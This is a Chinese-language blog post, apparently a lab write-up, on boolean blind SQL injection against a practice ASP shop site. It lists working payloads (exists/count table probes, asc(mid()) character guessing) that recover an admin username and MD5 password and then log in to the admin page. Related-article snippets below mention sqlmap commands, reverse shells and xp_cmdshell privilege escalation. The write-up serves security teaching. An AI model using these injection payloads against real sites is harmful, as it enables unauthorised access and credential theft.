shop靶机实践sql盲注获取后台管理员账号密码

最新推荐文章于 2024-08-11 08:00:00 发布
最新推荐文章于 2024-08-11 08:00:00 发布
阅读量3.7k 收藏 7
点赞数 1
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36706878/article/details/79573872
版权

shop靶机盲注获取后台管理员账号密码

 

找到注入点。

注入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485

首先分析一下为什么确定这是一个注入点:

一、 正常页面如下:

二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485’页面报错

三、 在URL后加and1=1即http://192.168.244.131:60785/shop/productshopxp.asp?id=485and 1=1 页面无变化

四、 在URL后加and1=2即http://192.168.244.131:60785/shop/productshopxp.asp?id=485and 1=2页面报错

  由以上几点可以得知,我们提交的一些数据或者命令被数据库执行,可以确定这就是一个注入点。

获得后台数据库中存储网站用户和密码的数据表。

从这个提交的数据我们大概可以猜测该注入为数字型的注入  sql语句大致如下:

Select  * from 表名 where id = 数字

判断是否存在某个表我们用下面的语句

and exists(select count(*) from 表名)

如果存在,则页面无变化,如果不存在,则页面返回没有此id的商品

我们先测试下admin这个表是否存在

and exists(select count(*) from admin)

 

 

发现页面无变化,则存在该表,再测一下users这个表

 

发现报错,大致可以认为该后台数据库中存储网站用户和密码的数据表,

那我们再测一下这个表中是否存在users或者user或者admin 和password这两列是否存在

and exists(select count(password)from admin)

 

and exists(select count(users)from admin)

结果发现users和user这两列都不对

再试试admin

and exists(select count(admin)from admin)

发现admin这一列存在,则可以确定如下:

存储账号和密码的表为admin

逐位猜解出用户名和密码(只需写出猜解前两位的过程)。

猜解用户名和密码时,我们需要一位一位的猜解,首先是要获取某一行的用户名和密码的长度,用法如下:

and (select top 1 len(admin) fromadmin)>一个数字

这里用二分法确定其长度和每一位字段的ascll值,

and (select top 1 len(admin) fromadmin)>7

发现报错

and (select top 1 len(admin) fromadmin)>4

页面正常

and (select top 1 len(admin) fromadmin)>5

页面报错,则admin表中用户名这一列第一行用户名长度为5

下面开始猜解每一位的ascll值

and (select top 1 asc(mid(admin,1,1))from admin)>97

这里top 1代表第一行   (admin,1,1)中第一个1为第一位,第二个1代表偏移几位,

页面报错

 

and (select top 1 asc(mid(admin,1,1))from admin)>50

页面正常

通过这样的方式确定admin第一行第一个字母ascll值为97 对照一下得a

下面猜测第二位

and (select top 1 asc(mid(admin,2,1))from admin)>99

 

 

页面正常

 

and (select top 1 asc(mid(admin,2,1))from admin)>100

 

页面报错 则第二位ascll值为100  是d

循环这样的方式最后得admin第一行为admin,password为MD5加密后的密码  解密后为admin

用获得的用户名和密码验证是否能登陆。

找到管理页面,

http://192.168.244.131:60785/shop/admin/login.asp

 

 

管理登录成功!

 

过客璇璇
关注
专栏目录
获取网站管理账户密码
Mike_Roger的博客
01-24 2万+
最近学长让用sqlmap获取一个网站的管理账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。   SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。   首先sqlmap据说是一个开源的
信息收集、sql注入获取DC3网站后台管理账号密码
longanquan的博客
07-29 1063
环境介绍 物理机(装有nmap工具) DC3靶机(简单点说就是一个无图形界面的Linux系统,打开这个系统不能进行任何操作。这个系统里有一个网站) kali虚拟机(装有joomscan、SQLmap等工具) 获取DC3的IP地址 由于DC3上不能进行任何操作,所以我们需要用其他手段获取它的ip地址。打开DC3的虚拟网卡,点高级,就能看到DC3的MAC地址 由于是桥接模式,物理机跟DC3在同一网段,利用物理机上的nmap工具对此网段进行扫描,对比结果不难找到与这个MAC地址对应的ip地址,这样就获取到了DC
ACCESS盲注获取网站的管理账户密码
weixin_48170459的博客
12-05 2002
我们将通过一个网站来熟悉ACCESS盲注 靶机: win2003 我们先在网站的各个地方寻找注入点,发现在id的位置存在一个注入点 接着判断是字符型注入还是数值型注入,发现是数值型注入 1.字符型测试:id=2’ and ‘1’='1或id=2" and “1”="1 2.数值型测试:id=2 and 1=1 接着进行错误注入判断 id=2 and 1=0 判断是否为ACCESS数据库 id=2 and exists(select * from sysobjects) id=2 and exists(
sqli-labs漏洞靶场~SQL注入(全网最全详解)
最新发布
weixin_67832625的博客
08-11 1393
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
sqlmap攻击学校靶机获取管理密码
rang的博客
09-10 836
sqlmap攻击学校靶机获取管理密码 1.尝试寻找注入点 注入点可能出现在网站和数据库交互的地方 用and 1=1 发现正常 用 and 1=2 报错 此处可能存在注入点 2.使用sqlmap自动检测是否存在注入点 sqlmap.py -u "注入地址" 存在注入点 3、获取数据库 sqlmap.py -u "注入地址" --dbs 其中mysql自带四个默认数据库 information_schema performance_schema mysql test 4.获取数据表(r
sql盲注 各种方法拿到 管理账户和密码
qq_41860876的博客
11-08 1532
任务092:手动漏洞挖掘-SQL盲注笔记 介绍 web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在 下面就是没有过滤好发现了他存在sql漏洞 sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了 看一下返回就结果没有显示任何东西 ...
(2020上半年第6天)小迪网络安全笔记(操作②)sql注入网站测试简单靶机网站搭建
u013630181的博客
06-16 495
我们代码采用的是:链接① 注意: 第一步:进入phpstudy根目录把php导入 其他菜单->网站根目录 也可以:D:\phpstudy_pro\WWW 第二步:这里推荐用notepad 新建test.php文件把代码复制进去(我这边用test做测试) (下面的代码是有错误的) <body> <?php $conn=@mysql_connect("localhost",'root','')or die("数据库连接失败!");; mysql_select_
[Kali系列]通过SQLMAP获取管理密码
weixin_45919207的博客
08-29 2564
[Kali系列第二章]通过SQLMAP获取管理密码准备靶场地址开启SQLMAP开始攻击KALI系列传送门 准备 靶场地址 http://shop.aqlab.cn:8001/single.php?id=1 开启SQLMAP sqlmap 开始攻击 进入KALI,打开终端,输入 sqlmat -u "http://shop.aqlab.cn:8001/single.php?id=1" 你会看到一个选择,直接回车 然后出现这个 在按回车 然后又一次出现选项 按回车 然后输入 sqlmat -u "
服务器管理账号sa,一次利用MSSQL的SA账户提权获取服务器权限
weixin_39542742的博客
07-29 991
遇到小人,把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之,发现相关信息一堆堆各种工具也用了不少 发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去,看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理一般都会用各...
E063-web安全应用-SQL盲注初级.pdf
12-02
SQL盲注SQL Blind Injection)是一种针对Web应用程序的安全漏洞利用方法,它发生在Web应用程序对用户输入的数据没有进行有效的验证和过滤时。在这种情况下,攻击者可以通过构造特定的查询字符串,尝试猜测数据库的...
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
靶机-凹丫丫新闻发布系统V4.7修改版asp+sqlserver带注入版(改)
05-21
凹丫丫新闻发布系统V4.7修改版asp+sqlserver带注入版!本人修改的版本去掉sql过滤!后台上传取消限制cer文件!内附安装说明!推荐环境windows server 2003 + iis6.0 + asp + sqlserver 2005 express ! include/conn.asp是数据库连接文件自行设置!在数据库中新建一个数据库(名字随意在conn.asp中也要相对修改),然后新建查询把网站目录下的news.sql里面的内容复制到查询里面执行(会提示错误但是是正常的忽略),在iis中设置网站默认页面为default.asp(不是index.asp),如果没有权限打开请给网站文件添加everyone用户加权限和iis用户加权限!还要不会你就去搬砖吧!另外不要下载之前的那个!代码没改好!
如何通过破解hash来获取管理密码
12-28
如何通过破解hash来获取管理密码. 高手勿进。
如何用sqllab获取软大靶机管理密码
weixin_47346400的博客
09-10 287
打开sqlmab,填入目标网址
bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行&&绕过 反弹shell string分析文件得到密码提权
YouthBelief的博客
11-30 1985
bulldog-1靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web漏洞思路ssh 利用思路步骤1:浏览网页 爆破目录步骤二: 破解hash步骤三:利用密码登录后台步骤四:利用命令执行(需要尝试绕过方法)步骤五:反弹shell0x03 提升权限步骤六:查看系统用户,确定需要关注的用户步骤七:查找每个用户的文件步骤八:拼接root密码提权0x04 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/bulldog/bulld
SQL注入漏洞:CMS布尔盲注python脚本编写
一个努力学习网安的小牛马
11-07 216
【代码】SQL注入漏洞:CMS布尔盲注python脚本编写。
使用python脚本的时间盲注完整步骤
wutiangui的博客
09-30 509
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based。tips:title=,&action=search需要使用burp抓包获得。我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名。
四招齐出——直取管理密码
得峰的专栏 [网络收藏]
05-12 5150
千辛万苦找到一台服务器(俗称“肉鸡”)并将它控制,定会想尽办法保持这段“姻缘”,于是乎,各种后门齐上阵。结果呢?鸡飞蛋打,毕竟人家的杀毒软件不是摆设。克隆或建一个管理账户呢?这也
SQL注入实战:盲注sqlmap运用解析
"这篇文档是关于网络安全实验,特别是SQL注入技术的一个实践教程,重点在于盲注和使用sqlmap工具。实验在Windows 7 x64系统作为靶机,Kali Linux作为攻击机的环境中进行,两台机器位于同一局域网内。靶机上运行了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值